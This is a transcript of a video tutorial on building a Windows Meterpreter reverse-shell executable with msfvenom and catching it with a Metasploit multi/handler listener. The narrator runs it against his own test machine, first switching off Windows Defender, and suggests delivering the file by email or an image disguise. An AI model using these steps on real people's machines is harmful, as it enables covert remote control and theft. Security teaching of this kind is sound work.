Hello everybody and welcome back to this tutorial, and right now we're going to take a look at a different tool that we haven't used before, which belongs to the Metasploit framework. Just this tool is called Msfvenom. Now what this tool is used for is basically it is used for creating payloads that then you are going to deliver to your target, whether it is a Windows target, a Linux target. It is basically simply just going to be a payload, something like a interpreter shell that the target will run on its actual PC or on its device, and then we will be able to gather the connection from that specific target and execute commands on their machine. It is some kind of a virus, a malware, a backdoor, and now we're going to take a look at a simple way how we can actually create one. One thing that you need to know is that this actual payloads that we're going to create with the Msfvenom are highly detectable by any antivirus and also by Windows Defender. So in order for us to test this, we will be needing to actually turn off the Windows Defender in case of this actual test, and then you can turn it back on later on. So first of all, I will just go right here. As we can see right here, some of these things are already turned off, but we need to turn all of them. So go to the virus and then threat protection. We don't want the current threats. We want the virus threat protection settings and then manage settings. So click right here, and all these things you need to turn off. Now it will ask you for the actual administrator password. So make sure that you click here yes, or enter a password if you have one for the administrator, and then turn all these things off. The reason why we are doing it is, once again, the payloads created with the Msfvenom tool are highly detectable because they are recognized by any antivirus vendor, because they have been used most of the time. So they will be detected by any PC that basically has any type of security measurements on it. Now, of course, later on we're going to take a look at how we can bypass security measures, how we can bypass Windows Defender and any antivirus, using different tools and also using our own tools. We're going to take a look at that later on, but for now let us just simply see how to create a simple payload. So go to your Kali Linux machine, open up your actual terminal, and then what we want to do, we want to simply first of all check the Msfvenom settings. So just type in your terminal Msfvenom and then --help. Click here enter, and then you will see right here all of the available options that we can use in order to create the actual payload for our Windows 10 target machine. So in our case, right now, I'm going to attack my own main machine, which is my Windows 10 machine, with the payload that we're going to create, and we will see whether it will work or not. Right now, let us start off with creating our payload. So the first thing we need to do is type the name of the program, which is Msfvenom, and then if we take a look at these settings right here, the important thing that we need to do, first of all, is to set the payload name. So payload to use, we already know the list of payloads. Now, if you want to, we can simply just type list payloads, as it says in the brackets right here. And what this will do is it will list all of the payloads available that you can create with the Msfvenom tool. But since we are attacking a Windows target, we are of course going to need a Windows payload. We already attacked in the previous two videos with a Windows payload, which is the interpreter shell. When we were attacking the Windows 7 target machine, we used both 32-bit and 64-bit interpreter shell payload, and right now we're going to use the 64-bit interpreter Windows payload because we are actually attacking a 64-bit machine. So right here, you can see all of the available payloads. There is a lot of them. You can see there are also payloads for Linux. There are payloads created using Java, CMD, so command prompt, Firefox payloads, so we can see a bunch of different payloads right here. Here are some of the OS X payloads, but we're interested in the actual Windows payloads, and we already know the name of the payload by default, so I will just run the help settings once again, and let's start with creating the payload. So -p for setting the payload, and now comes the name of the payload, so Windows / and then x64 in case you're attacking a 64-bit machine. In case you're not, set the 32-bit, and you simply just set the 32-bit simply just by deleting this part and continuing with the interpreter, and then / once again reverse _TCP. Now let me just add right here back x64. So this is the payload name. The next thing we need to set is the lhost and the lport. So the lhost and lport are simply just the settings. The lhost is our own IP address. That is the IP address that the target is going to connect to. So we want the target to connect back to us. That's why we set the setting lhost to be equal to the IP address of our own machine, of our own Kali Linux machine or attacking machine. And right here, I'm just going to check out my IP address. So I have config. My IP address is 192.168.1.6. So right here, I will simply just set lhost to be equal 192.168.1.6. That is the IP address of my Kali Linux machine. And the L port is simply just the local port on our Kali Linux machine to which the target is going to connect to. So this is going to be any port you simply want. Now make sure that you remember which port you set right here, because you will also need to set the same settings that we are writing right here, such as the lhost and lport, in the Metasploit Framework console. So in the MSF console, once we set up our listener, which is going to listen for the incoming connections, it needs to listen on the same port that you specified in this command for the payload, and also the IP address has to be the same in order for connection to work properly. So L port will be 4444. Now you can set any port you want really. You saw the examples of me using 4444 all the time, but you can simply just set anything you want, such as 5555. So let's go with the 5555. Just make sure that you remember the port number. Now, the next thing that we need to set is the file type, so -f, and we can see that option right here, which is the format, so output format. You can simply just set whether you want, for example, PowerShell file, Python file, exe file, and in our case, we indeed do want the exe file because we are running on Windows. So -f and then exe, and then the last thing that we need from all of these settings is -o for the output. And the output is simply just going to be the name of the payload. So -o, and then let's call it, for example, shell.exe. You can call it anything you want. It doesn't have to be shell.exe. And right here, once you type all of these settings, you can simply just click here, enter. And this will create the payload for you automatically, so you don't really have to do anything else besides this. In order to create this virus, you can create it simply just by running this command. It will output some of the different actual information about the payload, such as, for example, x64 from the payload selected for the ARC, no encoder or bad character specified, and we're going to take a look at the encoding and bad characters in the next few videos. For now on, let's just stick with this. So the payload size is 510 bytes. Final size of the exe file is 7168 bytes. Saved as shell.exe. It will save it in the directory that you ran this command in. So in my case, that is the /root directory. So if you just type simply ls in the same directory, you will see your file somewhere in there. So we can see shell.exe right here. And now what we need to do is we need to, first of all, in next terminal, I will clear the screen right here. And what I'm going to do is I'm going to run the MSF console in this terminal. And also I'm going to transfer the shell.exe to my Windows 10 machine. Now for the transfer methods, we are not really going to take a look at that right now. The transfer methods you can take, for example, sending the email with the payload to the target, or transferring it via USB drive, transferring it over web server, however you want to transfer it. You can simply just do that. For now on, we're simply just going to transfer it over USB, just so we can have it on our target machine. And this is the actual attack that you're going to perform if your target doesn't really have any vulnerability. So this is something that will always work. If you encode your payload really well and you make it bypass any antivirus, then all you need to care about is how you are going to deliver that payload to the target. Because there is no known vulnerability to that target, you need to deliver that payload using some different methods, such as, for example, social engineering. You send the payload over the internet, over email, you embed payload in an image, which we're going to take a look at later on. You simply just perform a social engineering so that, for example, the target person thinks that you sent them an image and they try to open it up, and they do indeed open an image, but in the background they also opened our payload, and now we have access to their actual machine. So right here, we have the USB plugged in. You can simply just do that just by going to the devices right here and then the USB, and then select the USB drive that is actually plugged in your main PC. Then it will transfer it to the actual virtual machine. And then right now you can simply just move the shell.exe to the actual USB drive. So in my case, it is hosted in the /media/root and then / the name of the actual USB drive. So once I move it there, I'll press here enter, it will copy, or it will not copy, it will simply just move the shell.exe file to the USB drive. Once it finishes this, then you can actually unplug the USB drive using the same method. So you can simply just go right here, devices, USB, and then uncheck the actual USB drive. Now, another actual method that you can use in order to transfer the file to your main PC is simply just by starting the Apache 2 web server. So service Apache 2 start, do that. Then, for example, because right now I actually removed the shell.exe to the USB drive, let's see how we can actually download this canv.txt. So what you want to do is you want to move the desired file that you want your target to actually download to the /var/www/html folder, because that is the default Apache 2 folder. Now, the next thing you need to do is navigate to that folder in order to check whether there are some undesired files right there, such as, for example, the Facebook, the 123.txt, the test.txt. Those are all of the files that we do not want our target to actually download. So let us go rm 123.txt, rm test.exe, rm Facebook, and then leave the directory empty just with the file that we want our target to actually download. And then if the USB downloading doesn't work, you can simply just open up your Google Chrome or any search engine that you're using on your main PC or on your Windows target machine. And then you can simply navigate to the IP address of the actual Kali Linux machine, and you will have the file right here, which you can simply just click on and it will download it right here. This is some actual result from the nweb scan, and it is hosted in this file. So this is not our virus, don't worry. I just simply showed you how you can actually move the virus to there and download it using the web server. But since we actually transferred it to our USB drive, we will have it right here. So ESD USB, we called it shell.exe. Let us copy it to our screen right here. So we have it on our desktop. You will notice that the Windows Defender is not presenting us any problem right now because we actually turned it off. So there is no need for us to worry about that. The only thing that we need to worry about right now is to set the correct settings in our Metasploit Framework console. So what we're going to use is we're going to use the exploit multi-handler, which allows us to actually handle multiple sessions or multiple connections depending on how many PCs actually connect back to us. And now right here, we need to set the payload. So make sure to set the same payload that you set in the payload making. So in my case, I set Windows x64 interpreter and then reverse TCP. Okay, now show options, and you will see different options. Let me just close this, enlarge this screen, and you can see there are three options right here. The first one we are not interested in. The second one is the lhost, which has to be the IP address of your Kali Linux machine. So we already know what it is. In my case, it is 192.168.1.6. So set lhost and then the IP address. And the L port has to be the port that you set in the actual payload creation, which in my case, I set that to be 5555. So set L port 5555. Press here enter, and now we can run our actual listening simply just by typing exploit. But another thing that you can actually do, for example, if you're waiting a connection from the multiple targets, you can simply just put this actual job into background by typing exploit.-j and then exploit-j and then -z. Press here enter, and what this will do is it will simply just put this listening in the background, and you can still execute different commands right here if you'd like. And the target, as soon as the target runs our file, we will get prompted right here with a new session opened. In order to actually kill that, to check out that job, you can simply just type here jobs, and you will see that it is running the exploit multi-handler and the options for that payload as well as the payload name. So this is the jobs that is running in the background, and we set it right now with that previous command. Okay, so right now let us run this file. We double click on it. we go back to our actual Kali Linux machine and we can see Meterpreter session 1 opened, and we got a connection from our Windows 10 machine. So press here enter. And in order to actually now go to that Meterpreter session, because we saw in the previous videos how you can go to the Meterpreter session by default, right now what you need to do is simply just type sessions in your actual MSF console, and you will see all of the active sessions that you have currently. So in my case, I have only one session because I only ran it from one PC. So we can see session 1, Meterpreter x64 Windows. This is the name of the actual target machine that we hacked, and this is the IP address of our Kali Linux machine, as well as our local port that we are listening on for the incoming connections, while as this is the actual IP address of our target machine and the target port that it is using in order to communicate with us. And all you need to do in order to enter the Meterpreter session with this target is check out the ID of that session and simply just type sessions or session-i1. Okay, so unknown command session, so it is possibly sessions-i and then 1. And sure it is, so we can see right here I have opened up the Meterpreter, and get UID is the command that actually tells us what is the target that we have currently opened in this session, and you can see that this name matches this name. That means that we are in the correct session. Now, in order to actually leave this session and not close it, so you, for example, just want to leave this session in order to go to a different one, you want to run the background command. So just type right here background, and it will put the session in the background. So if I just type sessions once again, you will see it is still there. It is still an active session, so we can enter it once again with this command if we want to. But right now, what this background allows us to do is go back to our MSF console and navigate through different sessions if we want to. So for example, I will run this once again. If you simply just use this actual shell.exe on a different PC and ran it on that PC in the same time as running this on the main Windows 10 machine that we are using right now, you will have two sessions right here, and you would be able to navigate between those two sessions as you like. So for example, you enter session 1 using sessions-i and then 1. You would be entering this session with Windows 10 PC, then you background it once you finish executing all the commands you need, and then you enter session number 2 using sessions-i and then 2, and then you enter the Meterpreter shell for the different target PC. Now in my case, I don't really have two sessions open, that's why we got an error, but that is how it would work. Basically, that would be about it for the Msfvenom basic usage, and we're going to take a look at a few different things in the next few videos regarding the creation of payload, the bypassing of the antivirus, and so on and so on. So hope you enjoyed this tutorial, and I hope I will see you in the next one. Bye!